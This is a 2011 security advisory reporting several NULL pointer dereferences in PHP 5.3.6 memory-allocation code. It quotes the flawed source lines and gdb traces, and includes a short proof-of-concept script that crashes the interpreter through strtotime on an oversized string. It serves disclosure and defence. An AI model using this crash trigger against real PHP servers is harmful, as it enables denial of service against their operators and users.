-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ PHP 5.3.6 multiple null pointer dereference ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://securityreason.net/
http://cxib.net/

Date:
- - Dis.: 20.07.2011
- - Pub.: 19.08.2011

Affected Software (verified):
PHP 5.3.6 and prior

Fixed:
PHP 5.3.7

Original URL:
http://securityreason.com/achievement_securityalert/101


- --- 0.Description ---
PHP is a general-purpose scripting language originally designed for web
development to produce dynamic web pages. For this purpose, PHP code is
embedded into the HTML source document and interpreted by a web server
with a PHP processor module, which generates the web page document. It
also has evolved to include a command-line interface capability and can
be used in standalone graphical applications.


- --- 1. PHP 5.3.6 multiple null pointer dereference ---
Some time ago we have reported list with possible NULL pointer
dereferences in php 5.3.6. If user may change size of malloc, it's
possible to get NULL pointer dereferences. I haven't enought time to
check security impacts for all these bugs.

To demonstrate these flaws, we may use default memory limit in OpenBSD
[512MB]. We should allocate a lot of memory like 510MB (still 2MB free).
If some string is longer than 2MB (example 4MB), and php try copy this
string using malloc/strlen etc then malloc return NULL. Then program is
counting with possible NULL pointer dereference or buffer overflow
sympthons.

Example:
http://cwe.mitre.org/data/definitions/690.html

where CWE-690 give CWE-476 NULL pointer dereference

good example for CWE-690 is

   tz->location.comments = malloc(comments_len + 1);
   memcpy(tz->location.comments, *tzf, comments_len);

This code may provide to null pointer dereference or simple crash with
nulling memory with memset()

  in.str = malloc((e - s) + YYMAXFILL);
  memset(in.str, 0, (e - s) + YYMAXFILL);
  memcpy(in.str, s, (e - s));

Program received signal SIGSEGV, Segmentation fault.
0xbba7581c in memset () from /usr/lib/libc.so.12
(gdb) x/i $eip
0xbba7581c <memset+44>: rep stos %eax,%es:(%edi)
(gdb) x/x $eax
0x0:    Cannot access memory at address 0x0
(gdb) x/x $edi
0x0:    Cannot access memory at address 0x0

In this case, memset() overwrite the memory with 0x0 char. If attacker
can put something else that 0x0, it would have security impact.

There are more interesting places, where user may try change size of
malloc. See bellow

- -id0-start---------
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/curl/interface.c?view=markup

820      if (!CRYPTO_get_id_callback()) {
821          int i, c = CRYPTO_num_locks();
822
823          php_curl_openssl_tsl = malloc(c * sizeof(MUTEX_T));
824
825          for (i = 0; i < c; ++i) {
826              php_curl_openssl_tsl[i] = tsrm_mutex_alloc();
827          }
828
829          CRYPTO_set_id_callback(php_curl_ssl_id);
830          CRYPTO_set_locking_callback(php_curl_ssl_lock);
831      }
- -id0-end---------


- -id1-start---------
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_date.c?view=markup
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_iso_intervals.c?view=markup
multiple malloc/calloc/realloc

323              uchar *buf = (uchar*) malloc(((s->lim - s->bot) +
BSIZE)*sizeof(uchar));
324              memcpy(buf, s->tok, s->lim - s->tok);

496      str = calloc(1, end - begin + 1);
497      memcpy(str, begin, end - begin);

346      s->errors->warning_messages =
realloc(s->errors->warning_messages, s->errors->warning_count *
sizeof(timelib_error_message));
347      s->errors->warning_messages[s->errors->warning_count -
1].position = s->tok ? s->tok - s->str : 0;
348      s->errors->warning_messages[s->errors->warning_count -
1].character = s->tok ? *s->tok : 0;
349      s->errors->warning_messages[s->errors->warning_count -
1].message = strdup(error);
- -id1-end---------


- -id2-start---------
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_tz.c?view=markup

210      tz->location.comments = malloc(comments_len + 1);
211      memcpy(tz->location.comments, *tzf, comments_len);
212      tz->location.comments[comments_len] = '\0';
213      *tzf += comments_len;
- -id2-end---------


- -id3-start---------
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/timelib.c?revision=305315&view=markup

124      tmp->trans = (int32_t *) malloc(tz->timecnt * sizeof(int32_t));
125      tmp->trans_idx = (unsigned char*) malloc(tz->timecnt *
sizeof(unsigned char));
126      memcpy(tmp->trans, tz->trans, tz->timecnt * sizeof(int32_t));
127      memcpy(tmp->trans_idx, tz->trans_idx, tz->timecnt *
sizeof(unsigned char));
128
129      tmp->type = (ttinfo*) malloc(tz->typecnt * sizeof(struct ttinfo));
130      memcpy(tmp->type, tz->type, tz->typecnt * sizeof(struct ttinfo));
131
132      tmp->timezone_abbr = (char*) malloc(tz->charcnt);
133      memcpy(tmp->timezone_abbr, tz->timezone_abbr, tz->charcnt);
134
135      tmp->leap_times = (tlinfo*) malloc(tz->leapcnt * sizeof(tlinfo));
136      memcpy(tmp->leap_times, tz->leap_times, tz->leapcnt *
sizeof(tlinfo));
- -id3-end---------


- -id4-start---------
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/pdo_odbc/pdo_odbc.c?view=markup

98          char *instance = INI_STR("pdo_odbc.db2_instance_name");
99          if (instance) {
100              char *env = malloc(sizeof("DB2INSTANCE=") +
strlen(instance));
101              strcpy(env, "DB2INSTANCE=");
102              strcat(env, instance);
103              putenv(env);
- -id4-end---------


- -id5-start---------
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/reflection/php_reflection.c?view=markup

238      class_entry->interfaces = (zend_class_entry **)
realloc(class_entry->interfaces, sizeof(zend_class_entry *) *
num_interfaces);
239      class_entry->interfaces[num_interfaces - 1] = interface_entry;
- -id5-end---------


- -id6-start---------
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/soap/php_sdl.c?view=markup

2368      prest = malloc(sizeof(sdlRestrictionChar));
2369      memset(prest, 0, sizeof(sdlRestrictionChar));
- -id6-end---------


- -id7-start---------
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/xmlrpc/libxmlrpc/base64.c?view=markup

26    b->data = malloc(sizeof(char)*(b->length));
27    b->data[0] = 0;

38      b->data = realloc(b->data, b->length);
39      b->ptr = b->data + b->offset;
- -id7-end---------


- -id8-start---------
http://svn.php.net/viewvc/php/php-src/trunk/TSRM/tsrm_win32.c?view=markup

532   cmd = (char*)malloc(strlen(command)+strlen(TWG(comspec))+sizeof("
/c ")+2);
533   sprintf(cmd, "%s /c \"%s\"", TWG(comspec), command);
534   if (asuser) {
535   res = CreateProcessAsUser(token_user, NULL, cmd, &security,
&security, security.bInheritHandle, dwCreateFlags, env, cwd, &startup,
&process);
536   CloseHandle(token_user);
- -id8-end---------


- --- 2. PoC (realloc/malloc) ---
This proof of concept was verified on NetBSD with php 5.3.7.

127# ulimit -m 100000
127# ulimit -v 100000
127# cat /www/strtotime.php
<?php
$strx=str_repeat("A",$argv[1]);
var_dump(strtotime($strx));
?>127#
127#  /cxib/5371/build/bin/php /www/strtotime.php 33388888
Memory fault (core dumped)

127# gdb -q /cxib/5371/build/bin/php
(gdb) r /www/strtotime.php 33388888
Starting program: /cxib/5371/build/bin/php /www/strtotime.php 33388888

Program received signal SIGSEGV, Segmentation fault.
0x0806e8bd in add_error (s=0xbfbfcf90,
    error=0x83ea7d8 "Double timezone specification")
    at /cxib/5371/ext/date/lib/parse_date.c:355
355             s->errors->error_messages[s->errors->error_count -
1].position = s->tok ? s->tok - s->str : 0;
(gdb) print s->errors->error_messages
$1 = (struct timelib_error_message *) 0x0
(gdb) print s->errors->error_count
$2 = 1835009


- --- 3. Fix ---
Use PHP 5.3.7


- --- 4. Greets ---
PHP Team for fixes and discussions.

sp3x infospec


- --- 5. Contact ---
Author: Maksymilian Arciemowicz

Email:
- - cxib {a\./t] securityreason [d=t} com

GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

http://securityreason.com/
http://securityreason.net/
http://cxib.net/

- -- 
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid                  Maksymilian Arciemowicz (cx) <max@cxib.net>
sub   4096R/58BA663C 2010-09-19
-----BEGIN PGP SIGNATURE-----

iQIcBAEBAgAGBQJOTe+0AAoJEIO8+dzW5bUwp8wP/AjlfHe2qsvFFLPDeB5t97hG
HXC1FJhVuPi0AYtSQU9AmmQqODiM4/JJjuTz1vDicqku6ANArk4ez18PuQDISIya
ujQsPRXO1WYp1FFpFw+3ZGVzawAFXqTFtN7XPI7VWhU38Rv8DzO6HxeuKceZmp94
U9SIBHr16xCDVNeHb4DRRpHdREp+RiAJbdPdviWNnZwCjHQvIhyEB5xpGX9Vak6h
fbNTJ4cXU0oNLjIpzaz25KwzlNWHgsqKDrt88q4ZQmL+Nw4GX6EUpZWuzAnWVc+2
gWaebO4sQqoL5NRLuYlYWnjvzry/8OImMipo9mzYAekk6/+u3hwWWWJ9GFOIVb4O
qLi3ZuaMZ2oBPsgFHsA3sncxDFMOk/3RnrF6efkUd/vxokpLnKO6JCqkruJU/cRa
+CiFHkznNGnZXudeLC+dFnzAHXI9WfwF0XTqqiAERItkJPjPS/iW5yMC/ULJ9f1i
1bVJii8wfaadlLi3kxtPs+PvcxqdpsLbPxZE1UxnD0I3ZhTuAWIr/w84+FyUlyxa
lwdMn59ldPvAIDieDTAWJ7knYNywDF5B7Uyx0NB4XzmN/vNK67XkfnpDcIL+Yqp0
2wuBrnyJQQqs2lsc1tSkLPDqk2BUwYMuQUm+LqFAGDNwYP541ynaOv1pkpHMEP8Z
aKYsR/+YLxX86t5Vsj1F
=YKvw
-----END PGP SIGNATURE-----